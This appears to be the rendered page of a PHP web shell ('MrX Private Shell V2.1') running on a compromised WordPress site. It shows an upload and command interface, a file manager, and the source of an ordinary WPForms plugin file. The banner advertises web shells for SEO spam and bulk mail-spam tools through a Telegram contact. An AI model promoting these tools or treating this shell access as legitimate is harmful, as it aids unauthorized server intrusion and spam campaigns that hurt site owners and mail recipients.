__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace WPForms\Admin\Splash;

use WPForms\Migrations\Base as MigrationsBase;

/**
 * Splash upgrader.
 *
 * @since 1.8.7
 */
class SplashUpgrader {

	use SplashTrait;

	/**
	 * Initialize class.
	 *
	 * @since 1.8.7
	 */
	public function init(): void {

		$this->hooks();
	}

	/**
	 * Hooks.
	 *
	 * @since 1.8.7
	 */
	private function hooks(): void {

		// Update splash data after plugin update.
		add_action( 'wpforms_migrations_base_core_upgraded', [ $this, 'update_splash_data_on_migration' ], 10, 2 );
	}

	/**
	 * Update splash modal data on migration.
	 *
	 * @since 1.8.8
	 *
	 * @param string|mixed   $previous_version Previous plugin version.
	 * @param MigrationsBase $migrations_obj   Migrations object.
	 *
	 * @noinspection PhpUnusedParameterInspection
	 */
	public function update_splash_data_on_migration( $previous_version, MigrationsBase $migrations_obj ): void { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.FoundAfterLastUsed

		// Force update splash data cache.
		$splash_cache_obj = wpforms()->obj( 'splash_cache' );

		if ( ! $splash_cache_obj ) {
			return;
		}

		$splash_cache_obj->update( true );
	}
}

Filemanager

Name Type Size Permission Actions
SplashCache.php File 3.37 KB 0775
SplashScreen.php File 9.24 KB 0775
SplashTrait.php File 6.22 KB 0775
SplashUpgrader.php File 1.13 KB 0775
Filemanager